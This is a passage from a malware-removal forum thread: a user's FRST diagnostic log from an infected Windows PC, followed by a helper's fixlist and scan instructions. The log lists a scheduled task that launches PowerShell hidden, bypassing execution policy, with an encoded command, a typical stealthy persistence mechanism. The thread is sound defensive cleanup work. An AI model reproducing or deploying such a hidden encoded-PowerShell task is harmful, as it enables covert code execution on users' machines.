Spotify (HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Spotify) (Version: 1.0.20.94.g8f8543b3 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version:  - Valve)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
The Enigma Protector v4.40 Build 20150619 (HKLM-x32\...\The Enigma Protector x64_is1) (Version:  - The Enigma Protector Developers Team)
Tixati (HKLM-x32\...\tixati) (Version:  - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.01 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)
XSplit Gamecaster (HKLM-x32\...\{192BAAFE-0440-45C5-8E9C-FA6F8581EC8F}) (Version: 1.5.1401.2102 - SplitMediaLabs)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {09243C41-78C6-4705-8A44-74ADF37148A0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-25] (Google Inc.)
Task: {15DCE0F0-4638-4ED2-8AE8-E66A1F6E8071} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
Task: {204D1C36-0B82-472C-9C74-22463EC1EE14} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Internet Security\Engine\21.0.0.100\SymErr.exe
Task: {2082BF41-00C5-4D3E-96FC-2E0BE3811523} - System32\Tasks\AdobeAAMUpdater-1.0-Simon-PC-Simon => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe
Task: {3DBE0C46-2759-4AD2-B89E-6C57BF404C98} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-03-13] (Piriform Ltd)
Task: {48E19AF3-2DD9-4715-A5DA-EF87694CDB2A} - System32\Tasks\{B9242E84-7B66-4DAB-9F83-6C1F55A37D6E} => pcalua.exe -a E:\Autorun.exe -d E:\
Task: {55749066-36D7-4CAF-88BF-B6CB1C3EF9EE} - System32\Tasks\{353FBC57-6237-441C-B63B-98BC2D9D416F} => pcalua.exe -a E:\CDSetup.exe -d E:\
Task: {6D238D9B-024B-4127-95BE-82B7AA15D31D} - System32\Tasks\{9C7E7CD6-234F-42F0-A024-3B1422CA0E10} => Firefox.exe hxxp://ui.skype.com/ui/0/7.4.0.102/no/abandoninstall?page=tsProgressBar
Task: {7F87DC8C-6CDF-4B37-BCB4-18B00E818746} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-25] (Google Inc.)
Task: {883668A6-F707-4DDF-A886-505891E36532} - System32\Tasks\GyazoUpdateTaskMachineDaily => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
Task: {8ED8F4F8-4365-4431-AA39-7536BCA6F5A1} - System32\Tasks\{6D9AE6C4-E019-018C-C9B4-9E2714B48E10} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand 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
Task: {979D3DBD-25E6-45A0-94F9-9C65718D37D3} - System32\Tasks\Norton Anti-Theft\Norton Error Analyzer => C:\Program Files (x86)\Norton Anti-Theft\Engine\1.9.0.14\SymErr.exe
Task: {9D3995D8-EDC8-49DE-A458-88F17D3EA586} - System32\Tasks\PornTime => C:\Program Files (x86)\PornTime\pt.exe
Task: {A564F7B1-A5A8-4A4D-A4BD-EDA62AD2FADE} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files (x86)\Norton Internet Security\Engine\21.0.0.100\SymErr.exe
Task: {AB055F26-183D-4829-AE93-8E290BD1CBCA} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Internet Security\Engine\21.0.0.100\WSCStub.exe
Task: {B3E7FCC8-AD9C-44DD-952D-229AA7603D16} - System32\Tasks\GyazoUpdateTaskMachine => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
Task: {B415E821-0F31-4DAD-B46B-855A3C2042D9} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {D7B89F05-CDAE-4B5F-AB09-B7A9BBDDE804} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {DBAA2EE1-0D9E-42A6-A5D1-2464AAE7B572} - System32\Tasks\Norton Anti-Theft\Norton Error Processor => C:\Program Files (x86)\Norton Anti-Theft\Engine\1.9.0.14\SymErr.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2014-07-16 10:06 - 2014-07-16 10:06 - 00672416 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll
2012-10-25 07:45 - 2012-10-25 07:45 - 00034304 _____ () C:\Windows\System32\sdo1ml6.dll
2014-05-20 19:33 - 2015-01-10 00:29 - 00117392 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2014-05-20 19:28 - 2015-01-10 09:07 - 00011920 _____ () C:\Program Files (x86)\NVIDIA Corporation\CoProcManager\detoured.dll
2015-12-25 23:21 - 2015-12-25 23:21 - 17647296 _____ () C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_235.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Simon\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Killer Network Manager.lnk => C:\Windows\pss\Killer Network Manager.lnk.CommonStartup
MSCONFIG\startupreg: Andy => C:\Program Files\Andy\HandyAndy.exe
MSCONFIG\startupreg: Box Edit => C:\Users\Simon\AppData\Local\Box\Box Edit\Box Edit.exe
MSCONFIG\startupreg: Box Local Com Server => C:\ProgramData\Box\ComServer\Box Local Com Service.exe
MSCONFIG\startupreg: BrowserChoice => "C:\Windows\System32\browserchoice.exe" /run
MSCONFIG\startupreg: Gyazo => C:\Program Files (x86)\Gyazo\GyStation.exe
MSCONFIG\startupreg: NvBackend => "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: Spotify => "C:\Users\Simon\AppData\Roaming\Spotify\Spotify.exe" /uri spotify:autostart
MSCONFIG\startupreg: Spotify Web Helper => "C:\Users\Simon\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"
MSCONFIG\startupreg: SteelSeries Engine => C:\Program Files\SteelSeries\SteelSeries Engine\SteelSeriesEngine.exe
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: Unified Remote v2 => C:\Users\Simon\Desktop\Ny mappe\RemoteServer.exe

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{AB2FEE24-8032-4E9E-92DA-64BB088FC41E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{F106D850-6184-4BD8-BEB3-45242004BC35}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{4E1B0C1D-5364-4F99-BD4A-ECCE74031C0A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{CB0C4F41-C187-4A1D-85F9-A69FF8D5CFEC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{13CAF80E-3321-4614-9CE3-74F2162BE597}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{31EDFDEA-FAEA-43B6-9F03-FE691930B95F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{A75C6E01-BECE-4F00-AA03-723A57B19147}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{98D1DBBE-BEA5-433E-9CA6-0B1714ACD936}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{B23CBBCF-50A7-478B-809F-83E2FDF83FD1}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{E4C6D351-DAD8-4220-BC6C-DE73EEA7C6DB}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{270EABF0-B2D9-4597-B0A7-F75061F48CA0}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [TCP Query User{BC3E98B8-D846-4D9F-8D92-6A5BA3495D70}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{66E7805C-67FB-47F1-A39F-0C47A01EE572}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [{4792FD49-5934-42CF-AAD3-73DEA7C5F851}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{409438CE-1684-45DD-95EA-6864DB5687E7}] => (Allow) LPort=2869
FirewallRules: [{2A1A026D-FFE9-4073-9BA4-45010D1B2086}] => (Allow) LPort=1900
FirewallRules: [TCP Query User{2C940A19-ACA9-41D0-B0E6-8F10E1832352}C:\users\simon\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\simon\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{099A47F4-D1F0-4242-A024-AC85A7DA0C05}C:\users\simon\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\simon\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{4046ED15-B5DC-44FE-AF82-CC6544125AB4}C:\users\simon\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\simon\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{61F78399-B7D2-4F40-8272-FA2FE8A5D8A8}C:\users\simon\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\simon\appdata\roaming\spotify\spotify.exe
FirewallRules: [{7C2A5245-8A80-4ACE-82CF-10DE7EAC0228}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{F35C17EE-A6B7-4485-A687-C311E3392A94}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{98406585-EE39-4584-BD3F-F1BF414A0CC5}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{5554D9CC-7BD0-453A-AC47-BD705640C175}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{AD7C4BAF-9C55-4CE0-A596-801278A9614F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{A5B089B6-F6E2-4203-ABFD-A28E27B8B359}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6BEFAD78-3D5C-4F18-9538-5A4C7CC3E0E9}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{0171AADA-49AA-4CDA-98B9-B7F5F5A75E44}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{FFE9D83D-7E4B-401D-84A3-5A947D59C412}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{086EA29B-9325-4BDB-B314-5EE46E605002}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{FF876EF3-52B9-4C91-9477-27F3E6247D4E}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{F2BBEFF5-FBA0-4432-B006-BE4E6540F707}C:\program files\tixati\tixati.exe] => (Allow) C:\program files\tixati\tixati.exe
FirewallRules: [UDP Query User{68543947-F16B-448E-9BE6-88FB44857456}C:\program files\tixati\tixati.exe] => (Allow) C:\program files\tixati\tixati.exe
FirewallRules: [{65714679-8478-4C66-92EF-1A3A0C03545C}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe
FirewallRules: [{98C0C0B1-31F6-41CF-9811-E3C54F0E8270}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe
FirewallRules: [{5EABEC4E-1B3F-493C-B50D-42F2D2BCB79C}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe
FirewallRules: [{2825A6B2-A9EA-4B3D-81D2-6E7A4E146574}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe
FirewallRules: [TCP Query User{0D481072-C761-4FB2-89F0-45AF6B6C9C3D}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{6C5190FB-1903-4387-9DE6-9A16CB3879CE}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{EA980882-35BE-47B4-A19B-2FD475CA6AB1}C:\program files (x86)\popcorn time\chromecast\node.exe] => (Allow) C:\program files (x86)\popcorn time\chromecast\node.exe
FirewallRules: [UDP Query User{1850CB56-D20F-4122-B53B-54A493C90733}C:\program files (x86)\popcorn time\chromecast\node.exe] => (Allow) C:\program files (x86)\popcorn time\chromecast\node.exe
FirewallRules: [{E7C2471B-B7D0-48B6-95F1-9797E71B957E}] => (Block) C:\program files (x86)\popcorn time\chromecast\node.exe
FirewallRules: [{ECB90B53-400F-4524-8D1B-261DDE021B0F}] => (Block) C:\program files (x86)\popcorn time\chromecast\node.exe
FirewallRules: [{1A445CA6-6818-4425-9939-793C713D4CD8}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{11EF1017-59B8-44AA-8733-6441A42883A5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{FB3936F5-A285-43E9-8E89-73B271B60BFE}] => (Allow) LPort=5556
FirewallRules: [{CF260196-7A31-4F17-BD1A-4A124C939586}] => (Allow) LPort=5558
FirewallRules: [{42715D29-0E28-4043-949D-57D4E66AC21F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{6D63373F-B12C-4589-8D9E-5EED49E92CBA}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{FAF73EE2-2C47-421B-829B-2B7CA0BEABD9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{E463B906-D4E7-4F07-BDCD-45B6B4A8CBF1}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [{07335363-4A29-4B87-B8BA-897571D157C3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [TCP Query User{58C9069B-3C00-44AD-924E-4366110F65CB}C:\program files\tixati\tixati.exe] => (Block) C:\program files\tixati\tixati.exe
FirewallRules: [UDP Query User{FBB2681F-4FF7-4AC6-B5DD-7D541FFB0DF2}C:\program files\tixati\tixati.exe] => (Block) C:\program files\tixati\tixati.exe
FirewallRules: [{2E9338DD-C557-4FCD-8ABF-081E0E5CE611}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

11-01-2015 23:29:09 Installed Box Edit
17-01-2015 13:52:54 Windows Update
18-01-2015 01:52:06 Windows Update
22-01-2015 20:56:02 Windows Update
28-01-2015 23:19:10 Windows Update
09-02-2015 19:51:33 Windows Update
10-02-2015 15:08:07 Windows Defender Checkpoint
20-03-2015 07:36:02 Windows Update
13-04-2015 22:25:56 Installasjonsprogram for Windows-moduler
13-04-2015 22:28:58 Installasjonsprogram for Windows-moduler
13-04-2015 22:43:24 Windows Update
14-04-2015 01:59:55 Removed Bonjour
14-04-2015 02:00:17 Windows Update
14-04-2015 07:35:42 Installed DirectX
16-04-2015 17:05:09 Windows Defender Checkpoint
17-04-2015 06:28:06 Windows Update
21-04-2015 15:23:14 Windows Update
25-04-2015 01:10:40 Windows Update
28-04-2015 22:13:02 Windows Update
04-05-2015 13:57:55 Windows Update
05-05-2015 13:38:54 Windows Defender Checkpoint
16-05-2015 02:50:08 Windows Update
17-05-2015 00:35:34 Installed DirectX
17-05-2015 01:48:39 Windows Update
20-05-2015 22:17:42 Windows Update
26-05-2015 13:34:14 Windows Update
02-06-2015 10:22:40 Windows Update
05-06-2015 10:26:15 Windows Update
09-06-2015 06:44:26 Windows Update
10-06-2015 22:10:45 Windows Update
13-06-2015 23:49:57 Installed DirectX
16-06-2015 18:07:50 Windows Update
18-06-2015 02:30:18 Windows Defender Checkpoint
23-06-2015 17:49:41 Windows Update
28-06-2015 17:18:39 Windows Update
03-07-2015 11:52:32 Windows Update
07-07-2015 09:04:10 Windows Update
16-07-2015 12:42:09 Windows Update
26-07-2015 02:02:33 Installasjonsprogram for Windows-moduler
26-07-2015 23:37:24 Windows Update
27-07-2015 01:05:15 Windows Update
30-07-2015 03:27:55 Windows Update
30-07-2015 03:55:25 Windows Update
03-08-2015 19:26:35 Windows Update
11-08-2015 13:24:46 Windows Update
10-10-2015 01:42:20 Windows Update
10-10-2015 01:55:52 Windows Update
11-10-2015 02:53:39 Windows Update
27-10-2015 01:21:50 Installasjonsprogram for Windows-moduler
01-11-2015 02:14:41 Windows Update
01-11-2015 03:02:02 Windows Update
13-11-2015 19:14:13 Windows Update
17-11-2015 01:18:30 Windows Update
07-12-2015 03:25:33 Windows Update
07-12-2015 05:05:11 Windows Update
23-12-2015 02:12:31 Windows Update
23-12-2015 03:00:11 Windows Update
25-12-2015 21:52:17 JRT Pre-Junkware Removal
25-12-2015 21:52:35 ComboFix created restore point
25-12-2015 22:14:12 JRT Pre-Junkware Removal
26-12-2015 02:09:09 Installed Sound Blaster Cinema
26-12-2015 03:00:48 Windows Update
26-12-2015 15:33:54 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (12/26/2015 02:03:18 PM) (Source: NvStreamSvc) (EventID: 2001) (User: )
Description: NvStreamSvcNvVAD initialization failed [6]

Error: (12/26/2015 02:03:18 PM) (Source: NvStreamSvc) (EventID: 2001) (User: )
Description: NvStreamSvcFailed to set NvVAD endpoint as default Audio endpoint [0]

Error: (12/26/2015 02:03:18 PM) (Source: NvStreamSvc) (EventID: 2001) (User: )
Description: NvStreamSvcNvVAD endpoint registration failed [0]

Error: (12/26/2015 02:40:51 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Programnavn med feil: steamwebhelper.exe, versjon: 3.17.73.86, tidsangivelse: 0x566f1544
Modulnavn med feil: libcef.dll, versjon: 3.2526.1348.0, tidsangivelse: 0x5643e1a9
Unntakskode: 0xc0000005
Feilforskyvning: 0x00e2f176
Feil prosess-ID: 0x15cc
Feil starttid for program: 0xsteamwebhelper.exe0
Feil programbane: steamwebhelper.exe1
Feil modulbane: steamwebhelper.exe2
Rapport-ID: steamwebhelper.exe3

Error: (12/25/2015 10:10:50 PM) (Source: NvStreamSvc) (EventID: 2001) (User: )
Description: NvStreamSvcNvVAD initialization failed [6]

Error: (12/25/2015 10:10:50 PM) (Source: NvStreamSvc) (EventID: 2001) (User: )
Description: NvStreamSvcFailed to set NvVAD endpoint as default Audio endpoint [0]

Error: (12/25/2015 10:10:50 PM) (Source: NvStreamSvc) (EventID: 2001) (User: )
Description: NvStreamSvcNvVAD endpoint registration failed [0]

Error: (12/25/2015 09:49:27 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programmet AdwCleaner.exe versjon 5.0.2.6 sluttet å samhandle med Windows og ble lukket. Hvis du vil se om det finnes mer informasjon tilgjengelig om problemet, ser du i problemloggen i kontrollpanelet for Handlingssenter.

Prosess-ID: b64

Starttidspunkt: 01d13f556d372a67

Avslutningstidspunkt: 2

Programbane: C:\Users\Simon\Desktop\Malware\AdwCleaner.exe

Rapport-ID: f3f89292-ab48-11e5-94ca-a088696cbf14

Error: (12/25/2015 09:49:12 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programmet mbam.exe versjon 2.3.125.0 sluttet å samhandle med Windows og ble lukket. Hvis du vil se om det finnes mer informasjon tilgjengelig om problemet, ser du i problemloggen i kontrollpanelet for Handlingssenter.

Prosess-ID: 1754

Starttidspunkt: 01d13f559e1de315

Avslutningstidspunkt: 10

Programbane: C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe

Rapport-ID: f14612a6-ab48-11e5-94ca-a088696cbf14

Error: (12/25/2015 09:14:32 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Programnavn med feil: mbam.exe, versjon: 1.0.0.532, tidsangivelse: 0x53518532
Modulnavn med feil: MSVCR100.dll, versjon: 10.0.40219.325, tidsangivelse: 0x4df2be1e
Unntakskode: 0x40000015
Feilforskyvning: 0x0008d6fd
Feil prosess-ID: 0x180c
Feil starttid for program: 0xmbam.exe0
Feil programbane: mbam.exe1
Feil modulbane: mbam.exe2
Rapport-ID: mbam.exe3


System errors:
=============
Error: (12/26/2015 03:34:08 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Tjenesten NVIDIA Streamer Service avsluttet uventet. Det har den gjort 1 gang(er).

Error: (12/26/2015 03:34:07 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Tjenesten NVIDIA Display Driver Service avsluttet uventet. Det har den gjort 1 gang(er).

Error: (12/26/2015 02:02:49 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Det oppstod et tidsavbrudd (30000 millisekunder) under venting på at tjenesten NVIDIA Network Service skal koble til.

Error: (12/26/2015 02:02:42 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: Det oppstod en feil under forsøk på lese den lokale vertsfilen.

Error: (12/26/2015 02:19:52 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Tjenesten Intel(R) PROSet/Wireless Zero Configuration Service kan ikke starte på grunn av følgende feil: 
%%1053

Error: (12/26/2015 02:19:51 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Det oppstod et tidsavbrudd (30000 millisekunder) under venting på at tjenesten Intel(R) PROSet/Wireless Zero Configuration Service skal koble til.

Error: (12/26/2015 02:18:23 AM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: Det oppstod en feil under forsøk på lese den lokale vertsfilen.

Error: (12/26/2015 02:16:12 AM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: Det oppstod en feil under forsøk på lese den lokale vertsfilen.

Error: (12/26/2015 02:15:47 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (12/26/2015 02:14:40 AM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: Det oppstod en feil under forsøk på lese den lokale vertsfilen.


CodeIntegrity:
===================================
  Date: 2015-12-25 22:00:26.834
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-12-25 22:00:26.787
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i7-4700HQ CPU @ 2.40GHz
Percentage of memory in use: 30%
Total physical RAM: 8112.24 MB
Available physical RAM: 5601.91 MB
Total Virtual: 16222.69 MB
Available Virtual: 13638.52 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:921.52 GB) (Free:353.12 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (DriverCD) (Fixed) (Total:10 GB) (Free:5.19 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 8BE4CCEC)
Partition 1: (Active) - (Size=921.5 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=10 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

There you go, most of the scans resulted in no hits whatsoever. But I'm positive the adware is still somewhere, because every time I click a text box, link or regular text that shouldn't be a link, I get redirected to these sites... Thanks for helping!



#4 Machiavelli

Malware Response Instructor, 4,114 posts, Location: Germany

Posted 27 December 2015 - 07:51 AM

Hey,

 

Please uninstall Chrome for now and install it again when we are finished with the removal process. Chrome has been modified.

 

Running from C:\Users\Simon\Downloads

Please move FRST to your Desktop.

 

 

STEP 1

Farbar Recovery Scan Tool (FRST) Script

  • Press the Windows Key + r on your keyboard at the same time. Type Notepad and click OK.
  • Copy the entire contents of the codebox below and paste into the Notepad document.
    start
    CreateRestorePoint:
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
    Hosts:
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [No File]
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
    EmptyTemp:
    end
  • Click File > Save As and type fixlist.txt as the File Name
  • Important: The file must be saved in the same location as FRST64.exe.

NOTICE: This script is intended for use on this particular machine. Do not use this script on any other machine; doing so may cause damage to your Operating System.

  • Right-Click FRST64.exe and select Run as administrator to run the programme.
  • Click Fix.
  • A log (Fixlog.txt) will open on your desktop. Copy the contents of the log and paste in your next reply.

STEP 2
ESET Online Scan
Note: This scan may take a long time to complete. Please do not browse the Internet whilst your Anti-Virus is disabled.

  • Please download ESET Online Scan and save the file to your Desktop.
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Double-click esetsmartinstaller_enu.exe to run the programme. 
  • Agree to the EULA by placing a checkmark next to Yes, I accept the Terms of Use. Then click Start.
  • Agree to the Terms of Use once more and click Start. Allow components to download.
  • Place a checkmark next to Enable detection of potentially unwanted applications.
  • Click Advanced settings. Place a checkmark next to:
    • Scan archives
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • Ensure Remove found threats is unchecked.
  • Click Start.
